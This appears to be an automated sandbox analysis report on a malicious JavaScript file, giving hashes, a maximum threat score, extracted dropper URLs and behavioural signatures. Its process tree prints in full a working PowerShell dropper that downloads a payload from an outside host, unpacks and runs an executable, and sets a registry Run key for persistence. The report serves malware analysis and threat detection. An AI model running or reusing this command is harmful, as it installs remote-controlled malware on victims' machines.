Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
29-08-2023 08:27
Static task
static1
Behavioral task
behavioral1
Sample
458045804580.js
Resource
win7-20230712-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
458045804580.js
Resource
win10v2004-20230703-en
windows10-2004-x64
10 signatures
150 seconds
General
-
Target
458045804580.js
-
Size
3KB
-
MD5
171a355d5785a185ea3b4e0ed492ab8f
-
SHA1
35074dcfb9ea1f95f1f5a5b0f55f9a15bec0b8cd
-
SHA256
b7a8c276f3c573a244ec940d6a15bb9b95137066596b4e82e812b75334771b95
-
SHA512
b0313df3a48eb9ba363feabd9cfd9f42f64496a4aac037558663eba1c1297e7cd2cf1d752687fed0944699ba7e28fcb04546edbe774eb8e5c0ab5b76e8004ade
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://instalfrio.cl/destination.txt
exe.dropper
http://instalfrio.cl/destination.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2332 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2332 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2332 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1596 wrote to memory of 2332 1596 wscript.exe 28 PID 1596 wrote to memory of 2332 1596 wscript.exe 28 PID 1596 wrote to memory of 2332 1596 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\458045804580.js1⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-